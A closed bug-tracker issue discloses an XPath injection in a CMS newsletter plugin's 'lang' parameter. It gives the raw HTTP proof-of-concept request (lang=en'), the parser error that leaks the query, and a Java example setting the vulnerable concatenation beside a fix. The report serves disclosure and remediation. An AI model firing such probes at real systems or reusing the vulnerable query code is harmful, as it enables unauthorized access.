CMS / CMS-5170

XPath Injection Vulnerability (lang param)


    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 3.5.1, 3.5.2
    • Fix Version/s: 3.5.3, 3.7
    • Component/s: Plugins (others)
    • Labels: None
    • Environment:
      Win 7 Ultimate EN 32bit
      Server: Jetty(6.1.21)

      Description

      The POST parameter 'lang' is vulnerable to XPath injection.

      --snip--
      POST /cms/plugins/newsletter/category/nodes HTTP/1.1
      Host: localhost:8080
      User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      X-Requested-With: XMLHttpRequest
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      Referer: http://localhost:8080/cms/event/index.html
      Content-Length: 137
      Cookie: ametys.accept.non.supported.navigators=on; JSESSIONID=1na81i031qhdw; __utma=111872281.3880910164568079000.1385252858.1385252858.1385252858.1; __utmb=111872281.1.10.1385252858; __utmc=111872281; __utmz=111872281.1385252858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
      Connection: keep-alive
      Pragma: no-cache
      Cache-Control: no-cache

      sitename=event&categoriesOnly=&debug=%255Bobject%2520Object%255D&userLocale=en&siteName=event&skin=demo&categoryID=root&lang=en'&node=root

      Response:

      org.apache.jackrabbit.spi.commons.query.xpath.ParseException: Encountered "\'//element(*, ametys:page)[@ametys-internal:tags =\'" at line 1, column 68.
      Was expecting one of:
      "or" ...
      "and" ...
      "div" ...
      "idiv" ...
      "mod" ...
      "*" ...
      "return" ...
      "to" ...
      "where" ...
      "intersect" ...
      "union" ...
      "except" ...
      <Instanceof> ...
      <Castable> ...
      "/" ...
      "//" ...
      "=" ...
      "is" ...
      ...
      --snip--
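      The quoted fragment in the error is what the tokenizer consumed as one string literal once the stray quote in lang=en' paired with the opening quote of the query's own literal, which is why the parser complains at the point where a path step ends. Below is an added example, not Ametys or Jackrabbit code, that shows the vulnerable concatenation beside a hardened form. The query shape, the /jcr:root/sites/... path, the SUPPORTED_LANGS set and the method names are assumptions made for the illustration; the two contexts it distinguishes, a value used as a path step and a value used inside a string literal, are the general point.

```java
import java.util.Set;
import java.util.regex.Pattern;

/**
 * Added example (not Ametys or Jackrabbit code). The query shape is hypothetical,
 * modelled on the fragment quoted in the ParseException. It shows the two places
 * untrusted input can land in an XPath string, a path step and a string literal,
 * and what the check looks like for each.
 */
public class LangParamHardening {

    // Assumption: the site's configured languages. In a real deployment this comes
    // from site configuration, not a hard-coded set.
    private static final Set<String> SUPPORTED_LANGS = Set.of("en", "fr", "de");

    // Only values that look like a two-letter language code are considered at all.
    private static final Pattern LANG_SHAPE = Pattern.compile("[a-z]{2}");

    // Conservative subset of characters accepted for any other path step (e.g. the site name).
    private static final Pattern NAME_SHAPE = Pattern.compile("[a-z0-9_-]+");

    /** Vulnerable pattern: request parameters are concatenated straight into the query text. */
    public static String naiveQuery(String site, String lang, String tag) {
        return "/jcr:root/sites/" + site + "/" + lang                                   // lang lands in a path step
             + "//element(*, ametys:page)[@ametys-internal:tags = '" + tag + "']";      // tag lands in a literal
    }

    /** Path-step context: there is no quoting to fall back on, so the value must be validated. */
    public static String requirePathStep(String value) {
        if (value == null || !NAME_SHAPE.matcher(value).matches()) {
            throw new IllegalArgumentException("invalid path step");
        }
        return value;
    }

    /** The language code is a path step too, and additionally must be a configured language. */
    public static String requireSupportedLang(String lang) {
        if (lang == null || !LANG_SHAPE.matcher(lang).matches() || !SUPPORTED_LANGS.contains(lang)) {
            throw new IllegalArgumentException("unsupported lang parameter");
        }
        return lang;
    }

    /**
     * String-literal context: XPath 2.0 escapes an apostrophe inside a single-quoted
     * literal by doubling it. Jackrabbit's grammar is XPath 2.0 based (the token names
     * in the error message suggest as much); that it honours this rule is an assumption.
     */
    public static String xpathLiteral(String value) {
        return "'" + value.replace("'", "''") + "'";
    }

    /** Hardened construction: validate every path step, encode every literal. */
    public static String safeQuery(String site, String lang, String tag) {
        return "/jcr:root/sites/" + requirePathStep(site) + "/" + requireSupportedLang(lang)
             + "//element(*, ametys:page)[@ametys-internal:tags = " + xpathLiteral(tag) + "]";
    }

    public static void main(String[] args) {
        // The report sends lang=en'; the trailing quote is the whole payload.
        String payload = "en'";

        System.out.println(naiveQuery("event", payload, "root"));
        // /jcr:root/sites/event/en'//element(*, ametys:page)[@ametys-internal:tags = 'root']
        // The stray quote pairs with the literal's opening quote, so the tokenizer sees
        // '//element(*, ametys:page)[@ametys-internal:tags = ' as one string literal:
        // the same fragment the ParseException in the report quotes.

        try {
            System.out.println(safeQuery("event", payload, "root"));
        } catch (IllegalArgumentException e) {
            // Map this to a generic 4xx. Never return the parser's message to the client;
            // the response in the report shows it disclosing the query structure.
            System.out.println("rejected: " + e.getMessage());
        }

        System.out.println(safeQuery("event", "en", "it's"));
        // /jcr:root/sites/event/en//element(*, ametys:page)[@ametys-internal:tags = 'it''s']
    }
}
```

      For a path step that must carry an arbitrary name rather than a code from a fixed set, Jackrabbit's jcr-commons ships org.apache.jackrabbit.util.ISO9075.encode(String) to turn it into a valid XML name; for a language selector, an allowlist is the simpler and stronger check, and it is what the hardened query above relies on.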

            People

            • Assignee: Laurence Aumeunier (laurence)
            • Reporter: liquidworm
            • Votes: 0
            • Watchers: 1
